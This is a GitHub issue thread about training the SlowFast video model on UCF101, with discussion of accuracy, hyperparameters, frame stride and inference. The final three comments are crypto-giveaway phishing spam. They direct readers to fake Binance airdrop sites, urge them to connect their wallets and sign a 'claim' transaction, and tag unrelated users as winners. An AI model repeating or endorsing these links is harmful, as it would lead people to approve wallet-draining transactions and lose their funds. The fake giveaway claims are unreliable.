### ISSUE TITLE
result in ucf101

### ISSUE THREAD

**Issue by qichenghan666** [RI-CH/SlowFastNetworks#11]
I trained the model in ucf101, after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data, is this a normal result?

**Comment by HorusMaster** [comment]
The folder organization is: train & validation but, which format the videos have to be? Because I have them in .avi and I get the next error: 
![Captura2](https://user-images.githubusercontent.com/33353659/62824400-a6bb6980-bb62-11e9-91c0-8733d1537ac9.JPG)

**Comment by HorusMaster** [comment]
> I trained the model in ucf101, after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data, is this a normal result?

Hi, I looks good acoording to the paper but when using inference how did it work?

**Comment by tomanick** [comment]
I also trained the model on ucf101 dataset. At first, I used the default hyperparameters which the author gave. Then I got the 73.50% of top 1 accuracy. Afterwards, I changed the learning schedule from StepLR to ReduceLROnPlateau and hyperparameters such as learning rates, weight decay, and so on. The top 1 accuracy became about 94%. 

Therefore, I think we should use our own hyperparameters and learning schedule so that we could get better results on our own datasets.

**Comment by patykov** [comment]
@tomanick how did you search for the hyperparameters? Would you mind sharing the ones that have worked for you?

**Comment by tomanick** [comment]
@patykov 
Maybe there was no standard answer for hyperparameters. I often found the better hyperparameters by trial and error. On UCF101 dataset, I used learning rate=0.001, weight decay = 0.0005, batch size=16, and clip length=64. The learning schedule which I used was ReduceLROnPlateau. In addition, I also found used AdamW as the optimizer could get better results than SGD sometimes.

Finally, maybe there would be much better hyperparameters than I used. Just give it a try and maybe you would find a surprise. Good luck!

**Comment by MStumpp** [comment]
@tomanick did you find a way to set the temporal stride τ used on input frames? in the paper they used values equal to 16, 8, ...

**Comment by sdjsngs** [comment]
@MStumpp   do you want to set the temporal stride like 16, 8 ? you can  look   into slowfastnet.py/class slowfast / forward   find code like this  slow = self.SlowPath(input[:, :, ::16, :, :], lateral)   input is a 5D tensor which  have dim like  [batch ,channel,temporal, h,w] ,so once you have a  input  with 64 frames， the temporal  axis  is 64 and you can use  ::16 ,that means you  choose   4 frames in 64  frames  with stride 16

**Comment by anuar12** [comment]
@tomanick @qichenghan666 @HorusMaster  Did you guys try to validate this model on datasets from the paper (Kinetics, Charades or anything else)? Does the accuracy look representative of the paper?

**Comment by luwanglin** [comment]
> I trained the model in ucf101, after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data, is this a normal result?

What is the accuracy of your validation sets, I hope you can tell me, thank you

**Comment by sdjsngs** [comment]
@tomanick  The top 1 accuracy became about 94%  is the  train accuracy for training from scratch ? 
 And since you use ReduceLROnPlateau as your lr_schedular, how did you get the validation set from ucf101?  The offical splits are three train/test splits,   Or you just give the train_ loss to the  ReduceLROnPlateau?    i used did a wrong split to get train/validation/test  and the test accuracy is 91%   training from scratch , and once i fix this spilt the top-1 accuracy  is just 65, which is close to the facebook-slowfast  i sincerely look forward to your reply !!!

**Comment by yangjinghit** [comment]
@HorusMaster 
did you get the inference code at last ?such as how to detect a small 
single video?

**Comment by Weed-eat-meat** [comment]
> I trained the model in ucf101, after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data, is this a normal result?
I want to confirm your experimental results  which is the experiment of ucf101 training from scratch on slowfast, As you said "after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data", which author's implementation are you using , have any changes been made?

**Comment by wangpanpan666** [comment]
> > I trained the model in ucf101, after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data, is this a normal result?
> > I want to confirm your experimental results  which is the experiment of ucf101 training from scratch on slowfast, As you said "after 70 epoch, the top 1 accuracy is 73.3%, the top 5 accuracy is 95.7% in training data", which author's implementation are you using , have any changes been made?

用好一点的显卡，然后精度就提高了哈哈哈哈

**Comment by vsumm** [comment]
Hai @wangpanpan666 @r1c7 

after completion of training on how to test model ??? 

can anyone provide an inference code it's very useful for me

Thanks

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @shawngux, @huangdongfa, @chuyangzhanfang, @Github-chen-z, @liaorui, @ct-toch, @algorithm007, @taomaree, @wuxinAI, @ZavierZh

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @flysky1991, @tang-junjie, @pbnj, @liutianyuan, @kaixindenange, @Shuimo03, @asahi-luna, @iamzephyr, @LLLLLin, @joeygiordano13
